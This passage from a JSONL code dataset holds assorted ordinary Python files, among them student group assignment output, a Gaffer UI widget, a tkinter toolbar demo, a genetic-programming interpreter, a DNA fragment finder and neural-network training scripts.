zip(finalRoomCombo,finalStudentAssignments,subjectNames,leaderAssignments,leaderRooms): #iterate by subject\n f=open(subjectName+'.txt','w')\n #print class data\n counter=1\n for room,classAssignments,leader in zip(subjectRooms,subjectAssignments,subjectLeaders):\n f.write('Group '+str(counter)+', '+roomList[room].time+', '+roomList[room].classroom)\n f.write(leader.name) #PILOT leader\n for student in classAssignments:\n f.write(student.name+', '+student.jhu+', '+student.mail)\n f.write('\\n')\n counter=counter+1\n #print leader data\n f.write('Leaders')\n f.write(leaderMeeting.classroom)\n for x in subjectLeaders:\n f.write(x.name)\n f.close()\n\ndef assign2(roomList,finalRoomCombo,finalStudentAssignments,subjectNames):\n for subjectRooms,subjectAssignments,subjectName in zip(finalRoomCombo,finalStudentAssignments,subjectNames): #iterate by subject\n f=open(subjectName+'.txt','w')\n #print class data\n counter=1\n for room,classAssignments in zip(subjectRooms,subjectAssignments):\n f.write('Group 
'+str(counter)+','+roomList[room].time+','+roomList[room].classroom+'\\n')\n for student in classAssignments:\n f.write(student.name+', '+student.jhu+', '+student.mail+'\\n')\n f.write('\\n')\n counter=counter+1\n f.close()\n\n","sub_path":"assignEverything.py","file_name":"assignEverything.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297589794","text":"##########################################################################\n#\n# Copyright (c) 2019, Image Engine Design Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n#\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n#\n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n##########################################################################\n\nimport Gaffer\nimport GafferUI\n\nimport IECore\n\nfrom Qt import QtWidgets\n\nclass _CellPlugValueWidget( GafferUI.PlugValueWidget ) :\n\n\tdef __init__( self, plug, **kw ) :\n\n\t\tself.__row = GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 )\n\t\tGafferUI.PlugValueWidget.__init__( self, self.__row, plug )\n\n\t\trowPlug = plug.ancestor( Gaffer.Spreadsheet.RowPlug )\n\t\tif \"enabled\" in plug and rowPlug != rowPlug.parent().defaultRow() :\n\t\t\tenabledPlugValueWidget = GafferUI.BoolPlugValueWidget(\n\t\t\t\tplug[\"enabled\"],\n\t\t\t\tdisplayMode=GafferUI.BoolWidget.DisplayMode.Switch\n\t\t\t)\n\t\t\tself.__row.append( enabledPlugValueWidget, verticalAlignment=GafferUI.VerticalAlignment.Top )\n\n\t\tplugValueWidget = self.__createValueWidget( plug[\"value\"] )\n\n\t\t# Apply some fixed widths for some widgets, otherwise they're\n\t\t# a bit too eager to grow. 
\\todo Should we change the underlying\n\t\t# behaviour of the widgets themselves?\n\t\tself.__applyFixedWidths( plugValueWidget )\n\n\t\tself.__row.append( plugValueWidget )\n\n\t\tself._updateFromPlug()\n\n\tdef childPlugValueWidget( self, childPlug ) :\n\n\t\tfor widget in self.__row :\n\t\t\tif widget.getPlug() == childPlug :\n\t\t\t\treturn widget\n\n\t\treturn None\n\n\t# By default, `PlugValueWidget.create( cell[\"value\"] )` is used to create\n\t# a widget for editing cells in the spreadsheet, but custom editors may be\n\t# provided for specific plug types.\n\n\t# Registers a function to return a PlugValueWidget for editing cell\n\t# value plugs of the specified type.\n\t@classmethod\n\tdef registerValueWidget( cls, plugType, plugValueWidgetCreator ) :\n\n\t\tcls.__plugValueWidgetCreators[plugType] = plugValueWidgetCreator\n\n\tdef __createValueWidget( self, plug ) :\n\n\t\tcreator = self.__plugValueWidgetCreators.get(\n\t\t\tplug.__class__,\n\t\t\tGafferUI.PlugValueWidget.create\n\t\t)\n\n\t\tw = creator( plug )\n\t\tassert( isinstance( w, GafferUI.PlugValueWidget ) )\n\t\treturn w\n\n\t__plugValueWidgetCreators = {}\n\n\tdef _updateFromPlug( self ) :\n\n\t\tif \"enabled\" in self.getPlug() :\n\t\t\tenabled = False\n\t\t\twith self.getContext() :\n\t\t\t\twith IECore.IgnoredExceptions( Exception ) :\n\t\t\t\t\tenabled = self.getPlug()[\"enabled\"].getValue()\n\t\t\tself.__row[-1].setEnabled( enabled )\n\n\t__numericFieldWidth = 60\n\n\t@classmethod\n\tdef __applyFixedWidths( cls, plugValueWidget ) :\n\n\t\tdef walk( widget ) :\n\n\t\t\tif isinstance( widget, GafferUI.NumericPlugValueWidget ) :\n\t\t\t\twidget._qtWidget().setFixedWidth( cls.__numericFieldWidth )\n\t\t\t\twidget._qtWidget().layout().setSizeConstraint( QtWidgets.QLayout.SetNoConstraint )\n\n\t\t\tfor childPlug in Gaffer.Plug.Range( widget.getPlug() ) :\n\t\t\t\tchildWidget = widget.childPlugValueWidget( childPlug )\n\t\t\t\tif childWidget is not None :\n\t\t\t\t\twalk( childWidget )\n\n\t\tif isinstance( plugValueWidget, GafferUI.VectorDataPlugValueWidget ) :\n\t\t\tplugValueWidget._qtWidget().setFixedWidth( 250 )\n\t\telse :\n\t\t\twalk( plugValueWidget )\n\nGafferUI.PlugValueWidget.registerType( Gaffer.Spreadsheet.CellPlug, _CellPlugValueWidget )\n","sub_path":"python/GafferUI/SpreadsheetUI/_CellPlugValueWidget.py","file_name":"_CellPlugValueWidget.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"501954459","text":"from tkinter import *\n\ndef doNothing():\n\tprint(\"Okay, I wont..\")\n\n\nroot = Tk()\n\n# ** Main Menu ** # \nmenu = Menu(root)\n\nroot.config(menu=menu) # configuring menu with root\n\nsubMenu = Menu(menu)\nmenu.add_cascade(label=\"File\",menu=subMenu)\nsubMenu.add_command(label=\"New\",command=doNothing)\nsubMenu.add_command(label=\"Open\",command=doNothing)\nsubMenu.add_separator()\nsubMenu.add_command(label=\"Exit\",command= doNothing)\n\neditMenu = Menu(menu)\nmenu.add_cascade(label=\"Edit\",menu=editMenu)\neditMenu.add_command(label=\"Redo\",command=doNothing)\neditMenu.add_command(label=\"Exit\",command= doNothing)\n\n\n# *** The Toolbar *** #\ntoolbar = Frame(root, bg=\"blue\")\n\nbtn_1 = Button(toolbar,text=\"Insert Image\",command=doNothing)\nbtn_1.pack(side=LEFT, padx=2, pady=2)\nbtn_2 = Button(toolbar,text=\"Print\",command=doNothing)\nbtn_2.pack(side=LEFT, padx=2, pady=2)\n\ntoolbar.pack(side=TOP, 
fill=X)\n\n\nroot.mainloop()","sub_path":"GUI/tkinter/MiniProjects/Toolbar/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"81225408","text":"#!/usr/bin/env python3\n\n# This is a sample client for Lighthouse's events endpoint that gathers\n# block rewards, sends them to an instance of the classifier API and prints the results\n# in real time.\n\nimport json\nimport requests\nimport sseclient\n\n\nEVENT_URL = \"http://localhost:5052/eth/v1/events?topics=block_reward\"\nHEADERS = { \"Accept\": \"text/event-stream\" }\n\nCLASSIFIER_URL = \"http://localhost:8000\"\n\ndef main():\n res = requests.get(EVENT_URL, stream=True, headers=HEADERS)\n res.raise_for_status()\n\n client = sseclient.SSEClient(res)\n\n for event in client.events():\n res = requests.post(f\"{CLASSIFIER_URL}/classify\", data=event.data)\n res.raise_for_status()\n\n classification = res.json()\n print(classification)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"event_listener.py","file_name":"event_listener.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"117626128","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/timesketch_api_client/story_test.py\n# Compiled at: 2020-03-13 10:57:40\n# Size of source mod 2**32: 1995 bytes\n\"\"\"Tests for the Timesketch API client\"\"\"\nfrom __future__ import unicode_literals\nimport unittest, mock\nfrom . import client\nfrom . import test_lib\nfrom . import story as story_lib\n\nclass StoryTest(unittest.TestCase):\n __doc__ = 'Test Story object.'\n\n @mock.patch('requests.Session', test_lib.mock_session)\n def setUp(self):\n \"\"\"Setup test case.\"\"\"\n self.api_client = client.TimesketchApi('http://127.0.0.1', 'test', 'test')\n self.sketch = self.api_client.get_sketch(1)\n\n def test_story(self):\n \"\"\"Test story object.\"\"\"\n story = self.sketch.list_stories()[0]\n self.assertIsInstance(story, story_lib.Story)\n self.assertEqual(story.id, 1)\n self.assertEqual(story.title, 'My First Story')\n self.assertEqual(len(story), 3)\n blocks = list(story.blocks)\n text_count = 0\n view_count = 0\n for block in blocks:\n if block.TYPE == 'text':\n text_count += 1\n elif block.TYPE == 'view':\n view_count += 1\n\n self.assertEqual(text_count, 2)\n self.assertEqual(view_count, 1)\n self.assertEqual(blocks[0].text, '# My Heading\\nWith Some Text.')\n blocks[0].move_down()\n blocks = list(story.blocks)\n self.assertEqual(len(blocks), 3)\n self.assertEqual(blocks[1].text, '# My Heading\\nWith Some Text.')","sub_path":"pycfiles/timesketch_api_client-20200319-py3.5/story_test.cpython-35.py","file_name":"story_test.cpython-35.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"529772804","text":"import sys\nsys.path.append(\"/IPNeuronaleNetze\")\nsys.path.append(\"/IPNeuronaleNetze/trainers\")\nimport tensorflow as tf\nfrom models.OurModel import OurModel\nfrom Trainer import Trainer\n\n# Please enter the filepath to your dataset. 
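\n# Note: the Trainer calls below expect \"Train\", \"Valid\" and \"Test\" subfolders under these paths.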
\nfilepath_age = \"/IPNeuronaleNetze/data/\"\nfilepath_gender = \"/IPNeuronaleNetze/data/\"\n\ndef main():\n # This main will start the training for both, age as well as gender estimation\n # with the default amount of epochs with the value 312 and an early stopping callback with the patience of 4. \n # You can change the amount of epochs by typing \"epochs = X\" into the Trainer constructor.\n # If you want to train a model by loading the weights of an allready trained model, \n # use the load_model method from the OurModel class. \n\n # After the training is done, the models will be saved and evulation files (.csv) will be created.\n # Use the parsers to interpret the .csv files\n\n # Start training for age estimation \n AgeModel = OurModel(0)\n AgeModel = Trainer(AgeModel.model, filepath_age + \"Train\",\n filepath_age + \"Valid\", filepath_age + \"Test\",\n identifier = 0)\n AgeModel.train()\n\n # Start training for gender estimation\n GenderModel = OurModel(1)\n GenderModel = Trainer(GenderModel.model, filepath_gender + \"Train\",\n filepath_gender + \"Valid\", filepath_gender + \"Test\",\n identifier = 1)\n GenderModel.train()\n\nif __name__ == \"__main__\":\n main()","sub_path":"trainers/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"305146224","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 6 09:46:08 2017\n\nThis file is able to execute a Cartesian Genetic Programming program (cgp). The program can be represented by a list of\nintegers. This list representation of integers is called the solutionList or chromosome. In this list a node is\nrepresented by 3 integers. The first two integers refers to the input indices and the third integer translates to the\noperation that should be performed with the inputs.\n\nA node refers to a single operation in a cgp program. This consist of two inputs and an operation.\nThe result of is the output of the node and can be used in any successive node.\nFeatures are the input values for the entire model, this are the only inputs that the first node can use.\nInputs refer to any value that a node (single operation) can use for its computation. The possible inputs are all the\nfeatures and the result of the previous nodes. The final input list contains all the features and all the outputs of the\nnodes.\n\nInput_id refers to the location in the input list.\nNode_id refers to the location in the chromosome or translated list. (note since a node contains of node_size elements\nthis id should be multiplied by node_size)\n\nThe output are the outputs of the last #outputs (currently 2) nodes.\n\"\"\"\n\nimport math\nimport numpy as np\nnode_size = 3 # How many numbers are needed for one node. 
Two for the input and one to determine the operation.\noutputs = 2 # Number of outputs that should be returned.\noperations = 17 # Number of supported operations.\n\noperation_list = ['+', '-', '*', '/', 'tanh', 'cos', 'tan', 'cosh', 'PI','sqrt' , 'log' , 'e', 'pow', 'acos', 'atan', 'acosh', 'atanh','1']\n\ndef translate(nr_features, chromosome):\n \"\"\"\n Translate a list of numbers (chromosome) into an representation of a cartesian genetic program.\n :param nr_features: number of feature that will be used in the genetic program.\n :param chromosome: The solutionList, List of numbers that should be translated into a cartesian genetic program.\n :return: A list representation of a cartesian genetic program.\n \"\"\"\n nr_nodes = math.floor(len(chromosome) / node_size)\n\n translated_list= [0] * len(chromosome) # Create new list in advance (is faster than with append)\n for i in range(nr_nodes): # Turns numbers into the right numbers/operation\n # starts with 0 and can be used to determine how many outputs of nodes can be used as input.\n translated_list[node_size*i ] = chromosome[node_size*i ] % (nr_features+i) # input 1\n translated_list[node_size*i+1] = chromosome[node_size*i+1] % (nr_features+i) # input 2\n\n translated_list[node_size*i+2] = operation_list[chromosome[node_size*i+2] % operations] # operaion\n return translated_list\n\n\ndef translate_item(nr_features, item_index, item_value):\n node_index = math.floor(item_index / node_size)\n sub_index = item_index - node_size * node_index\n if sub_index == 2:\n return operation_list[item_value % operations]\n else:\n return item_value % (nr_features + node_index)\n\n\ndef cgp(features, chromosome): #function that interpretes solution in terms of features -> returns two outputs\n \"\"\"\n Functions that translates a chromosome to a cgp program and applies the features to that program. Returns the output\n of the last #outputs nodes.\n :param features: Features that should be used to calculate the result.\n :param chromosome: The solutionList, List of numbers that should be translated to a cartesian genetic program.\n :return: The output of the last #outputs nodes.\n \"\"\"\n nr_nodes = math.floor(len(chromosome) / node_size) # number of nodes in the chromosome\n nr_features = len(features)\n nr_inputs = nr_nodes + nr_features\n\n if nr_inputs < outputs:\n raise ValueError(\"Number of possible outputs is smaller than the number of desired outputs\")\n\n # Inputs is used to keep track of the input values that are already calculated (or known at the start). This list\n # makes sure the each node is evaluated at most once. When it start it only knows the values of the features.\n # During the computation the list is filled with the output of the nodes.\n inputs = [None] * nr_inputs # Create list. None means that the value is not yet known.\n for i in range(nr_features):\n inputs[i] = features[i] # Copy the features into the input list.\n\n #translated_list = translate(nr_features, chromosome) # translate the chomoso\\mne into a cgp program.\n translated_list = chromosome\n # get outputs number of outputs. The first output is the last node, the second output is the second-last node etc.\n result = []\n for i in range(1, outputs + 1):\n # Get the output of the last + 1 - i node and append it to the result list. 
(nr_inputs is last + 1)\n        # The inputs list contains the values of all computed nodes and is used to pass these values to successive calls\n        # of calculate_input\n        result.append(calculate_input(translated_list, nr_inputs - i, inputs, nr_features))\n\n    return result\n\n\ndef calculate_input(cgp_program, input_id, inputs, nr_features):\n    \"\"\"\n    Get the value for input input_id. At the end of the function, the outputs of the nodes that are evaluated are stored\n    in inputs.\n    :param cgp_program: A cgp program, stored as list. Is the translation of a chromosome\n    :param input_id: ID of the input that must be returned. The first ids are the features [0, #features - 1] and the\n    other ids are the outputs of the nodes [#features, #features + #nodes - 1]\n    :param inputs: List that keeps track of all computed inputs. At the start it only contains the values for the\n    inputs. Currently unknown values have the value None.\n    :param nr_features: #features in inputs\n    :return: the values of inputs[input_id]\n    \"\"\"\n\n    if inputs[input_id] is not None: # value is already known, return value\n        return inputs[input_id]\n\n    node_id = input_id - nr_features # inputs[input_id] is not yet known, thus is not a feature, calculate the node_id\n\n    # Get the input index for the two inputs of this node.\n    a_index = cgp_program[node_size*node_id]\n    b_index = cgp_program[node_size*node_id+1]\n\n    # Get the value of the two inputs\n    a = calculate_input(cgp_program, a_index, inputs, nr_features)\n    b = calculate_input(cgp_program, b_index, inputs, nr_features)\n\n    # Get the operation.\n    o = cgp_program[node_size * node_id + 2]\n\n    # Calculate the output of this node.\n    if o =='+':\n        output = a+b\n    elif o =='-':\n        output = a-b\n    elif o =='*':\n        output = a*b\n    else:\n        if (b > 0) :\n            off = 0.00001\n        else:\n            off = -0.00001\n        output=a/(b + off) #safe division\n\n    # Store the output in the inputs list.\n    inputs[input_id] = output\n    return output\n\n#nr_features = len(features)\n#lst=translate(nr_features, chromosome)\n#length=len(lst)\n#nrnodes=length/node_size\n#nodelist=nrnodes*[0]\n#output1ref=nrnodes-2\n#output2ref=nrnodes-1\n\n    \ndef nodes_used(outputref, nodelist,lst, nr_features):\n    if outputref< nr_features :\n        return nodelist\n    outputref-=nr_features\n    #print(outputref)\n    if nodelist[outputref]==1:\n        return nodelist\n    nodelist[outputref]=1\n    #print(lst)\n    inputs=[lst[node_size*(outputref)], lst[node_size*(outputref)+1]]\n    #print(\"inputs\")\n    #print(inputs)\n    nodes_used(inputs[0],nodelist, lst, nr_features)\n    nodes_used(inputs[1],nodelist, lst, nr_features)\n    return nodelist\n    \n#test\n#sol=[1,1,'*',1,1,'+', 2,2,'+', 1, 2, '*',1,4,'*',2,4,'/', 5,2,'+', 1, 1, '*'] #should result in [1,0,0,1,0,0,1,1]\n#sol=[1, 3, '-', 2, 2, '+', 1, 0, '+', 3, 1, '*', 5, 0, '-', 1, 4, '+', 5, 7, '-', 7, 4, '+', 7, 7, '-', 7, 12, '+', 13, 2, '-', 6, 12, '-', 3, 15, '-', 12, 13, '*', 17, 4, '-', 14, 12, '-', 19, 8, '*', 11, 5, '-', 12, 19, '-', 10, 5, '+']\n\n\n#nr_features=4\n\ndef createListnodes(sol, nr_features):\n    #print(\"sol\")\n    #print(sol)\n    length=len(sol)\n    nrnodes=int(length/node_size)\n    nodelist=nrnodes*[0]\n    output1ref=nrnodes-2\n    output2ref=nrnodes-1\n    onlynodes=nodes_used(output1ref+nr_features, nodelist, sol, nr_features)\n    solution=nodes_used(output2ref+nr_features, onlynodes, sol, nr_features)\n    #print(\"Tes\")\n    #print (solution)\n    #turn nodelist into list size of solution:\n    newlist=nrnodes*node_size*[0]\n    for i in range(nrnodes):\n        if solution[i] is None:\n            print ('testing')\n            print (sol)\n        if solution[i]==1:\n            for j in range(node_size):\n                
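# flag all node_size slots of node i as used (the repeated assignments below are redundant but harmless)\n                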
newlist[node_size*i]=1\n newlist[node_size*i+j]=1\n newlist[node_size*i+j]=1 \n return newlist\n\n\ndef complete_translate(cgp_program, nr_features, nr_nodes):\n completeTranslate = (nr_features + nr_nodes) * [\"\"]\n for i in range(nr_features):\n completeTranslate[i] = \"f\" + str(i + 1) + \"\"\n\n for n in range(nr_nodes):\n base = n * node_size\n d = n + nr_features\n if (number_of_inputs(cgp_program[base + 2]) == 1) :\n completeTranslate[d] = cgp_program[base + 2] + \"(\" + completeTranslate[cgp_program[base]] + \")\"\n elif (number_of_inputs(cgp_program[base + 2]) == 0) :\n completeTranslate[d] = cgp_program[base + 2]\n else:\n completeTranslate[d] = \"(\" + completeTranslate[cgp_program[base]] + \" \" + cgp_program[base + 2] + \" \" + completeTranslate[cgp_program[base + 1]] + \")\"\n\n return completeTranslate\n\n\ndef translate_operation_to_ints(cgp_program):\n res = np.empty_like(cgp_program)\n for i in range(len(cgp_program)):\n k = cgp_program[i]\n if k == '+':\n k = 0\n if k == '-':\n k = 1\n if k == '*':\n k = 2\n if k == '/':\n k = 3\n if k == 'tanh':\n k = 4\n if k == 'cos':\n k = 5\n if k == 'tan':\n k = 6\n if k == 'cosh':\n k = 7\n if k == 'PI':\n k = 8\n if k == 'e':\n k = 9\n if k == 'pow':\n k = 10\n if k == 'acos':\n k = 11\n if k == 'atan':\n k = 12\n if k == 'acosh':\n k = 13\n if k == 'atanh':\n k = 14\n if k == 'sqrt':\n k = 15\n if k == '1':\n k = 16\n if k == 'log':\n k = 17\n res[i] = k\n return res\n\ndef number_of_inputs(k):\n if k == '+':\n return 2\n if k == '-':\n return 2\n if k == '*':\n return 2\n if k == '/':\n return 2\n if k == 'tanh':\n return 1\n if k == 'cos':\n return 1\n if k == 'tan':\n return 1\n if k == 'cosh':\n return 1\n if k == 'PI':\n return 0\n if k == 'e':\n return 0\n if k == 'pow':\n return 2\n if k == 'acos':\n return 1\n if k == 'atan':\n return 1\n if k == 'acosh':\n return 1\n if k == 'atanh':\n return 1\n if k == 'sqrt':\n return 1\n if k == '1':\n return 0\n if k == 'log':\n return 1\n return 2\n\n\n#createListnodes(sol, nr_features)\n\n \n \n\n#main program\n\n#newlist=[1,2,'+',4,0,'*']\n#features=[1,2,3,4]\n#input_id=5\n#print( calculateInput(newlist, input_id, features))\n\n \n#cgp(features, [1,2,0, 1,2,0, 4,3,2])\n\n\n","sub_path":"cgp.py","file_name":"cgp.py","file_ext":"py","file_size_in_byte":11530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"527354504","text":"# -*- coding: utf-8 -*-\r\nimport csv\r\n\r\n\"\"\"\r\nSTART_POSITION is the index of the first letter of the sequence.\r\ne.g., if START_POSITION is 1, then a sequence is numbered like this:\r\n ABCDEFG\r\n 1234567\r\nif START_POSITION is 0, then a sequence is numbered like this:\r\n ABCDEFG\r\n 0123456\r\n\"\"\"\r\nSTART_POSITION = 1\r\n\r\nsequence_infile = \"SA sequence.csv\"\r\nfragments_infile = \"csv for blast.csv\"\r\noutfile_name = \"SA sequence blast.csv\"\r\n\r\n\"\"\"\r\nEditing code below this line will affect functionality!\r\n\"\"\"\r\n\r\nsequence_string = \"\" # string to store entire sequence\r\nfragments = {} # dictionary to store the fragments\r\nfragments_size = 0 # how many fragments there are (updated as file is read)\r\nfragment_locations = {} # dictionary for start and end points of fragments\r\n\r\nprint(\"Reading files...\")\r\n\r\ntry:\r\n fragmentsfile = open(fragments_infile, 'r', newline = '')\r\nexcept IOError:\r\n print(fragments_infile + \" could not be opened. 
Please ensure this file exists or is not in use by another program.\")\r\n\r\nwith fragmentsfile: # open fragments_infile\r\n fragments_reader = csv.reader(fragmentsfile) # create reader object; reads fragments_infile\r\n line_number = 0 # start at first line (0)\r\n\r\n for row in fragments_reader:\r\n fragments[line_number] = row[0] # access fragment as string from csv row\r\n fragments_size += 1 # 1 fragment added\r\n line_number += 1 # 1 line read\r\n\r\ntry:\r\n sequencefile = open(sequence_infile, 'r', newline = '')\r\nexcept IOError:\r\n print(sequence_infile + \" could not be opened. Please ensure this file exists or is not in use by another program.\")\r\n\r\nwith sequencefile: # open sequence_infile\r\n sequence_reader = csv.reader(sequencefile) # create reader object; reads sequence_infile\r\n line_number = 0 # start at first line (0)\r\n\r\n for row in sequence_reader:\r\n sequence_string += row[0] # add each row to full sequence string\r\n line_number += 1 # 1 line read\r\n\r\nprint(\"Finding fragments in sequence...\")\r\n\r\nfor i in range(0, fragments_size):\r\n fragment_locations[fragments[i]] = [] # create new location list for fragment\r\n \r\n # find each fragment instance in sequence\r\n res = [j for j in range(len(sequence_string)) if sequence_string.startswith(fragments[i], j)]\r\n \r\n for j in range(len(res)):\r\n # create string with start and end position of fragment; add to dictionary\r\n fragment_locations[fragments[i]] += [str(START_POSITION + res[j]) + \", \" + str(START_POSITION + res[j] + (len(fragments[i]) - 1))]\r\n\r\nprint(\"Writing to output file...\")\r\n\r\ntry:\r\n outfile = open(outfile_name, 'w', newline = '')\r\nexcept IOError:\r\n print(outfile_name + \" could not be opened. Please ensure this file is not in use by another program.\")\r\n\r\nwith outfile: # create/open output file\r\n writer = csv.writer(outfile, delimiter=',') # create writer object; writes fragment locations\r\n writer.writerow([\"Fragment\"] + [\"# of Occurences\"] + [\"Start, End\"]) # creates 2 headers\r\n\r\n for i in range(0, fragments_size):\r\n # populates rows with fragment title + # occurences + locations\r\n writer.writerow([fragments[i]] + [len(fragment_locations[fragments[i]])] + fragment_locations[fragments[i]])\r\n\r\nprint(\"Complete! 
Output file: \" + outfile_name)","sub_path":"find fragment.py","file_name":"find fragment.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"329976478","text":"# -*- coding:utf-8 -*-\n# Author : ebbyzhang\n'''\ngenerator 只有在调用时才生成相应的数据\n不能索引某一个值,切片,截断\n可以节约空间\n只能一个个往后生成,提取,不能够往前,一般用于循环\n通过yield 可以实现并行计算\n'''\ndef fun(sum):\n return sum*2\n\na = (fun(i) for i in range(1000000))\n\n# for i in a:\n# print(i)\n\ndef fib(max):\n n,a,b=0,0,1\n while n bool:\n if not nums:\n return False\n if len(nums) == 1:\n return True\n\n flag = False\n jump_count = nums[0]\n for index, num in enumerate(nums[:-1]):\n if jump_count <= 0 and num <= 0:\n break\n\n if len(nums)-1-index <= num:\n flag = True\n break\n\n if num > jump_count:\n jump_count = num\n\n jump_count -= 1\n\n return flag\n\n\nif __name__ == '__main__':\n S = Solution()\n nums = [5, 4, 0, 2, 0, 1, 0, 1, 0]\n flag = S.canJump(nums)\n print(flag)\n","sub_path":"src/Algorithms/55跳跃游戏/55.py","file_name":"55.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"16300806","text":"import numpy as np\n\nimport os\nimport sys\nimport math\n\nfrom datetime import datetime\nfrom importlib import reload\nfrom pprint import pprint\n\nfrom platform import python_version\nprint(python_version())\n\nsys.path.append(os.getcwd())\n\nimport NDN3.NDNutils as NDNutils\nimport NDN3.NDN as NDN\n\nimport utils.data as udata\nimport utils.network as unet\nimport utils.analysis as uas\nimport utils.analysis_present as uasp\n\nimport fire\n\ndef runner(exp_folder, exp, run, cd2x, conv_reg_type, conv_reg_str, last_type, last_str, c_filters, secondary_conv_size, spacing):\n run_1(exp_folder, exp, run, cd2x, conv_reg_type, conv_reg_str, last_type, last_str, c_filters, secondary_conv_size, spacing)\n\n#\n# Slightly changed version of bs4_exp7: based on what/where paper (6942 Neural system identification for large populations separating “what” and “where”\n# - experiment with last layer reg.: l1 vs l2, smaller values\n# - experiment with higher cdx on conv filters\n# - experiment with different spacing (1, 2, 3::half of filter size)\n# - experiment with different 2nd and 3rd conv layer size.\ndef run_1(exp_folder, exp, run, cd2x, conv_reg_type, conv_reg_str, last_type, last_str, c_filters, secondary_conv_size, spacing):\n name = f'baseline4_whatwhere_Cd2x{cd2x}x{conv_reg_type}{conv_reg_str}_filtx{last_type}{last_str}_convsize{c_filters}_second_conv_s{secondary_conv_size}_spac{spacing}_x5000'\n exp = f\"{exp}x{run}\"\n\n def get_hsm_params_custom(input, output, i):\n _, output_shape = output.shape\n _, input_shape = input.shape\n pprint(f\"in: {input_shape} out: {output_shape}\")\n\n intput_w, input_h = int(math.sqrt(input_shape)), int(math.sqrt(input_shape))\n hsm_params = NDNutils.ffnetwork_params(\n verbose=False,\n input_dims=[1, intput_w, input_h], \n layer_sizes=[c_filters, c_filters, c_filters, output_shape], # paper: 9, 0.2*output_shape\n ei_layers=[None, None, None, None],\n normalization=[0, 0, 0, 0], \n layer_types=['conv','conv','conv','sep'],\n act_funcs=['softplus', 'softplus', 'softplus','softplus'],\n \n shift_spacing=[\n spacing if spacing > 0 else 13 // 2,\n spacing if spacing > 0 else secondary_conv_size // 2,\n spacing if spacing > 0 else secondary_conv_size // 2,0],\n conv_filter_widths=[13,secondary_conv_size,secondary_conv_size, 0],\n\n reg_list={\n 'd2x': 
[cd2x, cd2x, cd2x, None],\n conv_reg_type: [conv_reg_str, conv_reg_str, conv_reg_str, None],\n last_type: [None, None, None, last_str]\n })\n hsm_params['weights_initializers']=['normal','normal','normal', 'normal']\n hsm_params['biases_initializers']=['trunc_normal','trunc_normal','trunc_normal','trunc_normal']\n\n return hsm_params\n\n def get_training_params():\n epochs = 5000\n return {'batch_size': 16, 'use_gpu': False, 'epochs_summary': epochs//50, 'epochs_training': epochs, 'learning_rate': 0.001}\n\n input_tr_processed, output_tr, output_tr_mask = udata.load_data_multiple(\n [1], 'training', udata.normalize_mean_std)\n input_val_processed, output_val, output_val_mask = udata.load_data_multiple(\n [1], 'validation', udata.normalize_mean_std)\n\n for i in range(10):\n seed = i\n\n hsm_params = get_hsm_params_custom(input_tr_processed, output_tr, i)\n pprint(hsm_params)\n hsm, input_tuple = unet.get_network(\n input_tr_processed, output_tr,\n 'adam', \n get_training_params(),\n hsm_params,\n 'poisson',\n input_val_processed, output_val,\n output_tr_mask, output_val_mask,\n f\"{name}__{i}\", seed,\n\n )\n hsm.log_correlation = 'zero-NaNs'\n\n (input, output, train_indxs, test_indxs, data_filters, larg, opt_params, name_str) = input_tuple\n hsm.train(\n input_data=input, \n output_data=output, \n train_indxs=train_indxs, \n test_indxs=test_indxs, \n data_filters=data_filters,\n learning_alg=larg, \n opt_params=opt_params, 